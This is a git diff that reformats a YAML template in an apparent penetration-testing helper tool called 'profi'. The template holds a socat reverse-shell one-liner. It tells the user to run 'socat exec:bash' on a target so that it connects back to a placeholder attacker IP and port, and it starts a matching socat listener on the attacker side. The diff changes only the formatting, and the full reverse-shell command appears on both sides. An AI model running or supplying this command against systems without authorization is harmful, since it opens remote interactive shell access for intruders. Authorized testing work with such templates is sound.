--- a/src/profi/templates/scripts/listener-socat.yaml
+++ b/src/profi/templates/scripts/listener-socat.yaml
@@ -1,11 +1,9 @@
+---
 metadata:
-  filename: listener-socat.yaml
-  tags:
-  - shell
-  created: '2025-03-29'
-  author: Unknown
-content: 'echo "On your target, enter: socat exec:''bash -li'',pty,stderr,setsid,sigint,sane
-  tcp:{{ attacker_ip }}:{{ shell_port }}"; bash -c "socat file:`tty`,raw,echo=0 tcp-listen:{{
-  shell_port }}"
+  filename: "listener-socat.yaml"
+  tags: ["shell"]
+  created: "2025-03-29"
+  author: "Unknown"
 
-  '
+content: |
+  echo "On your target, enter: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:{{ attacker_ip }}:{{ shell_port }}"; bash -c "socat file:`tty`,raw,echo=0 tcp-listen:{{ shell_port }}"
